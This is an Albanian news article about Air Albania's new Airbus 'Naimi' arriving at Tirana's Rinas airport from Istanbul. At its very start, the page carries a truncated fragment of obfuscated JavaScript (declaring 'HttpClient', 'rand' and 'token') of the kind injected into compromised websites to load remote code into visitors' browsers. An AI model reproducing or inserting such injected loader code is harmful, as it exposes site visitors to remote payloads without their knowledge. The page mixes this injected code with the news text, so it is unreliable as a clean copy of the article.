;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

“Naimi” zbret në Rinas!

By

Flota e Air Albania u shtua ditën e djeshme me avionin e tretë për fluturime civile.

Avioni modern Airbus, i quajtur “Naimi” kreu fluturimin e parë me udhëtarë nga Stambolli drejt Tiranës. Përfaqësuesit e kompanisë shprehen krenarë për këtë shtesë të re të kapaciteteve të tyre, e cila erdhi si nevojë për të përballuar kërkesat gjithnjë e në rritje të klientëve të saj.

Stambolli është veçse një nga destinacionet e flamurmbajtëses shqiptare. Air Albania gjithashtu kryen fluturime të rregullta me Italinë, por jo vetëm. Nëpërmjet bashkëpunimit me Turkish Airlines, pasagjerët e Air Albania kanë mundësi të udhëtojnë në të gjithë botën.

Tashmë, përveç “Migjeni” dhe “Lasgushit”, “Naimi” do të jetë komoditeti më i ri që pasagjerët e Air Albania do të mund të shijojnë në udhëtimet e tyre drejt destinacioneve më të rëndësishme në Europë dhe kudo në botë.

Me rehabilitimin e situatës së pandemisë globalisht, tregu i udhëtimeve njohu një normalizim muajt e fundit, duke përforcuar nevojën për komoditet dhe cilësi në shërbime, standarde të cilat Air Albania ia ofron pasagjerevë të saj në çdo fluturim.

Artikuj të ngjashëm